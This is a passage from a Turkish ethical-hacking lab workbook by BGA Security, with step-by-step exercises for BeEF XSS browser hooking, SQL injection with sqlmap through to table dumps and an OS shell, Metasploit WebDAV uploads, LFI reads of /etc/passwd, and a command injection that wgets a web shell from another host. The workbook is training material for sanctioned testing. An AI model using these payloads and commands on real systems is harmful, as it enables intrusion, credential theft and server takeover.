134.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Beef indirmek için https://github.com/beefproject/beef adresi kullanılabilir. Buradaki zip dosyası
indirilerekaşağıdaki gibi unzipedilir.
root@bt:~# unzipbeef-master.zip
root@bt:~/beef-master#bundle install
root@bt:~/beef-master#./beef
[12:47:28][*] Bindsocket[imapeudora1] listeningon[0.0.0.0:2000].
[12:47:28][*] BrowserExploitationFramework(BeEF) 0.4.4.1-alpha
[12:47:28] | Twit: @beefproject
[12:47:28] | Site:http://beefproject.com
[12:47:28] | Blog: http://blog.beefproject.com
[12:47:28] |_ Wiki:https://github.com/beefproject/beef/wiki
[12:47:28][*] ProjectCreator:Wade Alcorn(@WadeAlcorn)
[12:47:28][*] BeEF isloading.Wait a few seconds...
[12:47:28][*] 10 extensionsenabled.
[12:47:28][*] 139 modulesenabled.
[12:47:28][*] 2 networkinterfaceswere detected.
[12:47:28][+] runningonnetworkinterface:127.0.0.1
[12:47:28] | Hook URL: http://127.0.0.1:3000/hook.js
[12:47:28] |_ UI URL: http://127.0.0.1:3000/ui/panel
[12:47:28][+] runningonnetworkinterface:6.6.6.121
[12:47:28] | Hook URL: http://6.6.6.121:3000/hook.js
[12:47:28] |_ UI URL: http://6.6.6.121:3000/ui/panel
[12:47:28][*] RESTful API key:9e64b98cefdb50ac6fb1384ccb4cb01d74a47535
[12:47:28][*] HTTP Proxy:http://127.0.0.1:6789
[12:47:28][*] BeEF serverstarted(presscontrol+ctostop)
2.Adım:
Beef web yönetim paneli hangi network interface için kullanılacaksa onun adresi ile aşağıdaki gibi açılır.
Biz6.6.6.0/24 subneti üzerindeçalışacağımıziçinbuarayüzü seçiyoruz.
Erişimadresi:http://6.6.6.121:3000/ui/panel
Ön tanımlı kullanıcıadı/parola: beef/beef
135.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım:
Sisteme login olduktan sonra kurbana XSS açıklığı mevcut bir web uygulaması için link gönderilerek
browseryönetimini ele geçirmemizgerekecek.Gönderileceklinkşuşekilde olmalıdır.
http://www.example.com/sort_news?ID=<script src=http: http://6.6.6.121:3000/hook.js ></script>
buradaki http://6.6.6.121:3000/hook.js javascript dosyası beef tarafından üretilen ve kurban browserda
çalıştırılacak javascriptdosyasıdır.
4.Adım:
Kurban istediğimiz sahte sayfaya bağlandıktan sonra kullanıcının browserini istediğimiz gibi yönetebiliriz.
Kurbanın iç networkünde port tarama,kurbana ait kamera görüntüsü alma veya kullanıcı browserinda
sesçıkartma gibi bir çok faliyetyapılabilir.
Ele geçirilenkurbanbroserinaaitbazıbilgiler.
136.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
5.Adım:
Örnek olarak kullanıcı browserinda bir ses çıkartalım veya vereceğiz dosyaya gore kullnıcıya müzikte
dinletebilirsiniz.Bizörnekbirwavdosyasıdinletiyoruz.
137.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
https://github.com/beefproject/beef/wiki/Interface
---
UygulamaNo:BGA-PT-40
Uygulama Adı: XSS Üzerinden Yerel Ağ Taraması
Amaç:
KullanılanAraçlar:
beef (kurbanınbrowserındanporttarama)
Adımlar:
1.Adım:
XSS üzerinden Kullnıcı browserini yönetme bölümünde BEEF kurulumu ve browser yönetimine bir giriş
yapılmıştı. Şimdi ise kurbana XSS açıklığı mevcut bir web uygulaması için link gönderilecek ve kullanıcının
bu adresi ziyaret etmesi sağlanarak kullanıcı browser üzerinden yerel ağda port taraması
gerçekleştirilecektir.
Açıklığın bulunduğuURL:http://www.example.com/sort_news?ID=
Açıklığı barındıran Parametre:ID
KullanıcıyagönderilecekURLşuşekilde olmalıdır;
http://www.example.com/sort_news?ID=<script src=http: http://6.6.6.121:3000/hook.js ></script>
Buradaki http://6.6.6.121:3000/hook.js javascript dosyası beef tarafından üretilen ve kurban browserda
çalıştırılacak javascriptdosyasıdır.
2.Adım:
Hedef browser yöneterek iç networkte port taramak için Commands/Networks menüsünden Port
Scanner seçilir. Ve hedef IP adresi(leri) verilerek kurbana ait iç IP adresi veya IP adres bloğuna port
taraması gerçekleştirilebilir.
138.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Port tarama sonuçlarınıgörüntüleyelim;
Komutsatırındanda aşağıdaki gibi porttarama sonuçlarıgörüntülenebilir;
139.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
https://github.com/beefproject/beef/wiki/Interface
---
UygulamaNo:BGA-PT-41
Uygulama Adı: Basit SQL Injection Denemeleri
Amaç: Hedef web uygulamasında input alan bölümlere manuel olarak farklı karakterler(metadata)
girerek SQL sorgularında manipülasyonlar oluşturarak veritabanın bunlara karşı cevaplarını görmek ve
sql injectionaçıklığıtespitetme.
KullanılanAraçlar:
TamperData
Live Http Header
Mutillidae
Adımlar:
Error basedsql injectiondenemeleri;
1.Adım:Hata tabanlı sql injection tespit etmek için input isteyen bölümleri değiştirerek veritabanı
sorgularındahata oluşturupbunugörmek
140.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
id=0 parametresi ile aldığı input için veritabanında SELECT * FROM tablename WHERE id.number=’0’
şeklinde bir sorgu yaptığını tahmin ettiğimiz sunucu için id=0’ şeklinde bir tırnak(‘) göndererek sorgunun
SELECT * FROM tablename WHERE id.number=’0’’ şekline dönüşmesini sağlıyoruz ve sayfanın hata
dönmesini bekliyoruz.
SQL sorgusunda id.number=’0’’ şekline dönüştüğü için açılmış tırnak kapatılmamıştır hatası aldık.Input
bölümüne id=’0’ şeklinde bir istek girdiğimizde ise hata almamamız gerekiyor.Çünkü sql sorgumuzda
id.number=’’0’’şekline dönüşecektir.Sql ‘’veya‘’‘’şekillerininherikisinide kapatılmışsaymaktadır.
141.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Görüldüğü gibi sorgumuzda sorun olmamış ve talep ettiğimiz sayfa görüntülenmiştir.Bu durumda
http://testasp.vulnweb.com/showforum.asp?id= URL adresinde id parametresinde hata tabanlı sql
injectionaçıklığıvardır denilebilir.
2. Adım:Live Http Headerkullanarakhatatabanlı sql injectionbulma.
Kullanıcı adı ve şifreyi girip login demeden önce firefox eklentisi olan Live http header eklentisini tools
menüsüaltındanbulupçalıştırılır.
142.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ardından Login işlemi gerçekleştirilerek Live Http header tarafından gönderilen post talebinin
yakalanmasıbeklenir.
143.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Post verisi yakalandıktan sonra Replay denilir.Ve sql injection açıklığı aranacak parametrenin değeri ile
oynanır ve replaydenir..(kullanıcıadı bölümüne tırnak(‘) işareti ilave edilmiştir)
Ve sayfanınhata veripvermeyeceği kontrol edilir.Görüldüğügibisayfaaşağıdaki gibi birhatadönmüştür.
144.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
Uygulama No:BGA-PT-42
Uygulama Adı: Sqlmap Kullanarak SQLi hatalarında Veri Çekme
Amaç: Bulunanbirsql injectionaçıklığıile sisteme aitveritabanınaerişim(read/write/update/insert).
KullanılanAraçlar:
Sqlmap
Adımlar:
1.Adım: Sql injectionaçıklığıolanbir URL bulma;
2.Adım: SqlMap ile bu açıklıktan faydalanarak varolan veritabanlarını(-dbs) , mevcut kullanıcıyı(--current-
user) bulalım.
root@pentest09:/pentest/database/sqlmap# python sqlmap.py -u
'http://testasp.vulnweb.com/showforum.asp?id=0' --dbs--current-user
….
….
[02:15:03] [INFO] fetching currentuser
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
| upass | nvarchar |
+--------+----------+
[02:21:38] [WARNING] HTTPerror codesdetectedduringtesting:
500 (Internal ServerError) - 7 times
[02:21:38] [INFO] fetched data logged to text files under
'/pentest/database/sqlmap/output/testasp.vulnweb.com'
[*] shuttingdownat02:21:38
5.Adım: Dbo.userstablosundaki uname ve upasskolonlarındakimevcutveriyi çekelim;
root@pentest09:/pentest/database/sqlmap# python sqlmap.py -u
'http://testasp.vulnweb.com/showforum.asp?id=0' -Dacublog -T dbo.users-Cuname,upass --dump
….
….
[02:24:27] [INFO] startingdictionary-basedcracking(md5_generic_passwd)
[02:24:27] [INFO] starting2 processes
[02:24:30] [INFO] cracked password 'none' for hash '334c4a4c42fdb79d7ebc3e73b517e6f8'
[02:24:31] [INFO] postprocessing table dump
Database:acublog
Table:dbo.users
[1 entry]
+-------+-----------------------------------------+
| uname | upass |
+-------+-----------------------------------------+
| admin | 334c4a4c42fdb79d7ebc3e73b517e6f8 (none) |
+-------+-----------------------------------------+
[02:24:31] [INFO] table 'acublog.dbo.users' dumped to CSV file
'/pentest/database/sqlmap/output/testasp.vulnweb.com/dump/acublog/users.csv'
[02:24:31] [WARNING] HTTPerror codesdetectedduringtesting:
500 (Internal ServerError) - 9 times
[02:24:31] [INFO] fetched data logged to text files under
'/pentest/database/sqlmap/output/testasp.vulnweb.com'
[*] shuttingdownat02:24:31
148.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-43
Uygulama Adı: Sqlmap Kullanarak İşletim Sistemini Ele Geçirme
Amaç: Sql injection açıklığınıişletimsistemi bazındahedefi elegeçirmekamaçlıkullanma.
KullanılanAraçlar:
Sqlmap
Adımlar:
1.Adım: --os-shell parametresiile sqlmapile işletimsistemiele geçirme;
root@pentest09:/pentest/database/sqlmap# python sqlmap.py -u
'http://testasp.vulnweb.com/showforum.asp?id=0' --os-shell
…
…
[02:32:27] [INFO] theback-end DBMSisMicrosoftSQLServer
web server operating system:Windows2003
web application technology:ASP.NET,MicrosoftIIS6.0, ASP
back-end DBMS:MicrosoftSQLServer2005
[02:32:27] [INFO] testing if current useris DBA
[02:32:27] [INFO] resumed:0
[02:32:27] [WARNING] the functionality requested might not work because the session user is not a
database administrator. You can try to provide --dbms-cred switch to execute statements as a DBA user
if you were able to extractand cracka DBA password by any mean
[02:32:27] [WARNING] time-based comparison needs larger statistical model. Making a few dummy
requests,pleasewait..
[02:32:32] [WARNING] it is very important not to stress the network adapter's bandwidth during usage
of time-based queries
[02:32:33] [INFO] testing if xp_cmdshellextended procedureisusable
[02:32:34] [INFO] heuristicsdetected web pagecharset'ascii'
[02:32:34] [WARNING] theSQLquery provided doesnotreturn any output
[02:32:46] [INFO] xp_cmdshellextended procedureisusable
[02:32:46] [INFO] going to use xp_cmdshell extended procedure for operating system command
execution
[02:32:46] [INFO] calling WindowsOSshell. To quit type'x' or 'q' and press ENTER
os-shell>
Ek Kaynaklar:
---
Uygulama No:BGA-PT-44
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Bundansonraki aşama zaafiyetiçerenbirflashuygulamasınıuploadetmekveyaonline url vermek.
3.Adım
Google üzerindenFlashdosyasıbulmakiçin site:example.comfiletype:swf şeklinde biraramayapılabilir.
Bir flash uygulaması gömülü safadan ilgili swf uzantılı flash dosyasını indirmek için firefox üzerinde sağ
tıklayıppage infodediktensonraaşağıdaki gibi mediamenüsündensave asdiyerekdosyaindirilebilir.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
5.Adım:
Aynı şekilde Hp swfscan uygulaması ile de flash dosyalarında bulunan güvenlik zaafiyetleri tespit
edilebilir.
Ek Kaynaklar:
https://www.owasp.org/index.php/Category:SWFIntruder
http://h30499.www3.hp.com/t5/Following-the-Wh1t3-Rabbit/SWFScan-FREE-Flash-decompiler/ba-
p/5440167
---
UygulamaNo:BGA-PT-45
Uygulama Adı: HTTP Metodları ve Güvenlik Zafiyetleri (HTTP PUT, WebDav)
Amaç:
KullanılanAraçlar:
IISwebdav+ metasploit
153.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Adımlar:
1.Adım:
Hedef sistemler üzerinde web sunucunun kötü konfigre edilmesinden dolayı HTTP PUT veya DELETE
methodlarıbazenaçık kalabilmektedir.
Bu methodlarile hedef sunucuyadosyagönderme ve silme mümkünolabilmektedir.
Hedef bir network için ilgili methodların açık olup olmadığını tespit etmek ve açık ise bir dosya atmak
veyadosyasilmekiçinmetasploitaux modüllerindenhttp_putmodülükullanılabilir.
2.Adım:
Metasploitile ilgilimodülünçalıştırılması;
root@bt:/var/www/swfintruder/testSwf#/opt/metasploit/msf3/msfconsole
_ _
/ / __ _ __ /_/ __
| | / | _____ ___ _____ | | / _
| | /| | | ___ |- -| / / __ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / - __ | | | | __/| | | |_
|/ |____/ ___/ / ___/ / __| |_ ___
=[ metasploitv4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1023 exploits - 567 auxiliary - 168 post
+ -- --=[ 262 payloads - 28 encoders- 8 nops
=[ svn r16295 updated today (2013.01.09)
msf > useauxiliary/scanner/http/http_put
msf auxiliary(http_put) >showoptions
Moduleoptions(auxiliary/scanner/http/http_put):
Name Current Setting Required Description
---- --------------- -------- -----------
ACTION PUT yes PUT or DELETE
FILEDATA msf testfile no The data to upload into the file
FILENAME msf_http_put_test.txt yes The file to attemptto write or delete
PATH / yes The pathto attemptto write or delete
Proxies no Use a proxy chain
RHOSTS yes The targetaddressrangeor CIDRidentifier
154.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
RPORT 80 yes The targetport
THREADS 1 yes The numberof concurrentthreads
VHOST no HTTP servervirtual host
msf auxiliary(http_put) >
3.Adım:
İlgil modül parametreleriningirilmesi;
RHOSTS için bir hedef subnet verilebilir. ACTIONS için PUT yada DELETE methodunun seçilmesi sağlanır.
DELETE methodu seçilirse hedef sistemde silinecek dosyanında bildirilmesi gerekir. Ön tanımlı olarak
PUT method seçilidir.Ve default bir text dosyası hedef sunucuya gönderilir. İstenirse bu dosya
değiştirilebilir.
msf auxiliary(http_put) >setRHOSTS 6.6.6.0/24
RHOSTS=> 6.6.6.0/24
msf auxiliary(http_put) >exploit
[-] Error: The host(6.6.6.0:80) wasunreachable.
[-] File doesn'tseemto exist.The upload probably failed.
[-] Error: The host(6.6.6.1:80) wasunreachable.
[-] File doesn'tseemto exist.The upload probably failed.
İlgili modül hedef subnetteki ilgili port üzerinden PUT method ile dosya atmayı deneyecektir. İlgili
methodaçık olansistemleredosyayıatacaktır.
4.Adım:
Hedef sistem üzerinde IIS webdav kurulu is eve PUT method açık ise aşağıdaki exploit bunun için
kullanılabilir.Hedef sistembilgisininsetRHOSTkomutuile verilmesi yeterlidir.
msf auxiliary(http_put) >useexploit/windows/iis/iis_webdav_upload_asp
msf exploit(iis_webdav_upload_asp) >show options
Moduleoptions(exploit/windows/iis/iis_webdav_upload_asp):
Name CurrentSetting Required Description
---- --------------- -------- -----------
PATH /metasploit%RAND%.asp yes The path to attemptto upload
Proxies no Use a proxy chain
RHOST yes The targetaddress
RPORT 80 yes The targetport
VHOST no HTTP server virtual host
155.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(iis_webdav_upload_asp) >
Ek Kaynaklar:
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
---
Uygulama No:BGA-PT-46
Uygulama Adı: Firefox HTTP Tamper Data Eklentisi Kullanma
Amaç: Firefox Tamper data eklentisi ile web trafiğine hakim olma (durdurma ve üzerinde değişiklik
yapabilme).Buşekildeweb güvenlikzaafiyetleri bulma.
KullanılanAraçlar:
Firefox
TamperData
Adımlar:
1.Adım: TamperData çalıştırma
2.Adım: Aşağıdaki ekrandastart tamperdiyerekbaşlıyoruz
156.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3. Adım: Artık Tamper Data gelecek http isteklerini yakalamak için pusuda bekleme moduna geçiyor.Biz
de yakalatıpmanupüle etmekistediğimizhttpisteğimizi başlatıyoruz.
157.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Login dedigimizde Tamper Data’nın aşağıdaki gibi talebi yakalayacağına şayit
olacaksınız.Continuetamperişaretini kaldırarakTamperdiyebiliriz.
158.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
5.Adım: Artık aşağıdaki ekrandaistediğinizgibimanüpüle edebilirsiniz.
159.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6. Adım: Biz basit bir sql enjeksiyonu açıklığı kontrol ediyoruz.admin’ and ‘1’=’1’-- ifadesi ile, eğer
kullanıcıadı adminve 1=1 ise şifre alanınabakmadan(--) sisteme loginol diyoruz.
7.Adım: OK diyerek talebin server tarafına gönderilmesini istiyoruz.Aşağıdaki ekrandada görüldüğü gibi
sql injectionaçıklığıbulunansisteme adminkullanıcısınınparolasınıbilmedenloginolduk.
160.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-47
Uygulama Adı: Firefox Live HTTP Headers Eklentisi Kullanarak Veri Manipulasyonu
Amaç: Http trağini yakalama ve gelen giden verinin detaylarını görüntüleme,input değerleri ile oynama
ve webgüvenlikzaafiyetleri keşfetme.
KullanılanAraçlar:
Adımlar:
1.Adım: Live Http headers eklentisi tüm diğer eklentiler gibi Tools menüsü altında bulunur. Buradan
başlatıyoruz.
161.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Testasp.vulnweb.com/Search.asp adresinde bga sözcüğünü aratıyoruz.Aynı anda Live Http
Header’ın yakalamasını bekliyoruz.Görüldüğü gibi yapılan http isteği yakalandı.
3.Adım: Bu http isteği replaydenilerekistenildiği gibimanüpüle edilebilir.
162.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Biz örneğimizde Search isimli parametreye XSS (Cross site Scripting) açıklığına sebep olacak bir
input(<script>alert('testxss');</script>) verdik.
5.Adım: Bu şekilde isteği verdiğimizde aşağıda da görüldüğü gibi ekrana bir alert ile test xss yazdırılmış
oldu.Bu şekilde Http live header ile araya girip çeşitli parametrelere çeşitli girdiler vererek sonuçlarını
yorumlayarakzaafiyettesbitindebulunulabilir.
163.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-48
Uygulama Adı: Burp Proxy Kullanarak Web Güvenlik Testleri
Amaç: Burpsuite uygulamasıkullanılaraklocal file inclusionaçıklığıile index.phpdosyasıokuma
KullanılanAraçlar:
Burp suite
Mutillidae
Adımlar:
1.Adım: Mutillidae üzerindenFiletextViewerisimliLFIaçıklığı içerenmenüyüaçma
164.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: İlgili menülerinherhangi birini seçiyoruz.
3.Adım:İlgili web sorgusunu yapmadan once aşağıdaki gibi burp suite proxy açılır ve intercept is on
seçilir.
165.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: İlgili http trafiği 2. Adımdaki ekranda başlatılır. Ve oluşan trafik aşağıdaki gibi burp tarafından
yakalanır. Ve bizim kontrolümüzde bekler. Üzerinde istedigimiz gibi değişiklik yaptıktan sonra server
tarafına iletebiliriz. Aynı şekilde gelen cevapta once bize gelecek bizim değişikliklerimiz ardından client
tarafına gidecektir.
5.Adım: İlgili Http trafiğinde textfile değerini index.php olarak seçip sağ tıklayarak sent to repater diyoruz.
Amacımız index.phpscriptininiçiniokumak.
166.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6.Adım: Aşağıdaki ekrandaGobutonunabasılarakhttp postisteğininsunucutarafınailetilmesisağlanır.
167.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
7.Adım: Sunucu tarafından gelen cevap öncelikle burp tarafından yakalanıp durdurulacaktır. Ve buradan
ister raw menüsü altından okuyabiliriz istersek render menüsü altından web dizayn şeklinde de sonucu
görebiliriz. Index.php içeriğini aynen bize getirdiğini rahatlıkla görebiliriz. Böylece buradaki açıklık
kullanılaraklocal dosyayıokumuşolduk.
168.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
Uygulama Adı: LFI(Local File Inclusion) Kullanarak Dosya Okuma
Amaç: Üzerinde local fileinclusionaçıklığıbulunanlinuxsunucunun/etc/passwddosyasınınokunması
KullanılanAraçlar:
burp suite
mutillidae
Adımlar:
1.Adım: Öncelikleaşağıdaki yoldansunucuüzerindekidosyalarıokuyabileceğimizbölümüaçıyoruz.
169.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım: Buradan herhangi bir menüyü seçip ilerleyecegiz fakan bunun öncesinde localimizde burpsuite
proxyçalıştırmamız ve kullandığımızbrowserinayarlarını(127.0.0.1:8080) da değiştirmeliyiz.
3.Adım: BurpSuite üzerinde aşağıdaki gibi intercept is on olacak şekilde yakalama işlemini devreye
alıyoruzve yukarıdan seçtigimizdosyaiçinview file diyoruz.
170.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Dosyayı görüntüle(view file) tıkladıktansonraburpsuite trafiği yakalayacaktır.
5.Adım: textfile parametresini aşağıdaki gibi ../../../../../../etc/passwd şeklinde bir input veriyoruz.Bu
yerelde ulaşmak istedigimiz dosyaıdır. ../../../ ifadesi ise linux sistemlerde bir önceki dizine geç
demektir.Rootdizininegitmekiçinbirhayli buifadedenkullanıyourz.
171.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
6.Adım: Yukarıdaki burp suite ekranında forward diyerek aşağıdaki gibi dosyanın içerigini browserimizda
görüntüleyebiliriz.
Ek Kaynaklar:
172.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
---
Uygulama No:BGA-PT-49
Uygulama Adı: RFI Kullanarak Sisteme Zararlı Yazılım Yükleme
Amaç:Aldığı input bilgisi ile komut çalıştırmaya elverişli olan bir web sunucu üzerinde uzakdan dosya
dahil edipsunucuyuele geçirmek.
KullanılanAraçlar:
Mutillidae
Laudanumshell.phpscripti
Adımlar:
1.Adım: Mutillidae üzerinde nslookup komutuna input gönderen aşağıdaki textbox’a farklı parametreler
ile komutlarçalıştıracağız
2.Adım:Linux işletim sistemlerinde ; işareti ile ayrılan komutlar sıra ile koşturulur.bizde nslookup
komutunalocalhostparametresiniveripardındanpwdkomutuile hangi dizindeolduğumuzugörebiliriz.
173.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
3.Adım:Şimdi ise locahost parametresinden sonra ; işareti koyup wget http://192.168.1.102/shell.php
komutu ile bu sunucudaki shell.php dosyasını mutillidae dizinine download ediyoruz.Sunucuya uzaktan
dosyadahil etmişolacağız.
4.Adım: Mutillidae ana dizini altına ilgili scriptin gelip gelmediğini test ediyoruz. Bunun için
http://192.168.1.102/mutillidae/shell.php adresini kullanmamız gerekiyor. Ve aşağıda görüldüğü gibi
webshellimizisunucuyaatıldı.Loginoluyoruz.
174.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
5.Adım: Artık sunucuüzerinde komutlarımızıkoşturmayabaşlayabiliriz.
175.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-50
Uygulama Adı: Directory Treversal Açıklığı Kullanarak Sistem Gezinimi
Amaç: Directory traversal açıklığı ile hedef sunucuda dizin dolaşarak hassas dosyaları(/etc/shadow ,
/etc/hosts,./ssh_authorizedv.s) okuma.
KullanılanAraçlar:
Adımlar:
1.Adım: Directorytraversal açıklığını barındıran parametre page olaraktesbitedildigini varsayalım.
176.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2.Adım:Bulunduğumuzdizinden/etc/dizininegidippasswddosyasınıokuyalım
3.Adım: Şimdi ise farklıbi dizine (/var/log) gidipsunucuyalogingirişlerine aitloglarıokuyalım.
177.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Sucunudaki hostsdosyasınıinceleyelim.
5.Adım: Son olaraktaresolv.conf dosyasınabakalım.
178.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Ek Kaynaklar:
---
Uygulama No:BGA-PT-51
Uygulama Adı: Web Güvenlik Testleri için Örnek Online Uygulamalar
Amaç: Online websiteler/uygulamalarkullanılarakwebgüvenliktestleriyapma
KullanılanAraçlar:
HackerTarget.com
Google.com
Shodanhq.com
Testasp.vulnweb.com
Adımlar:
1. Adım: Hackertarget.com isimli web sitesinden çeşitli web güvenlik zaafiyetleri online olarak test
edilebilir.Ücretli üyelikgerektirmektedir.
179.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
2. Adım: Exploit-db.com üzerinden google-dorks menüsünde çeşitli web güvenlik zaafiyetleri içeren
açıklıkların bulunmasıiçinilgili googlearamamethodlarıbulunabilir.
3. Adım: ShodanHQ üzerinden çeşitli güvenlik zaafiyetleri bulma. Default user/pass kullanan web
uygulamalarülke şehirkurumolarakbulunabilir.
180.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
4.Adım: Google.com üzerinden web uygulama güvenlik testlerinde kullanılabilecek hassas bilgilerin
bulunması.
181.
[BEYAZ ŞAPKALI HACKERLAB ÇALIŞMALARI KİTAPÇIĞI]
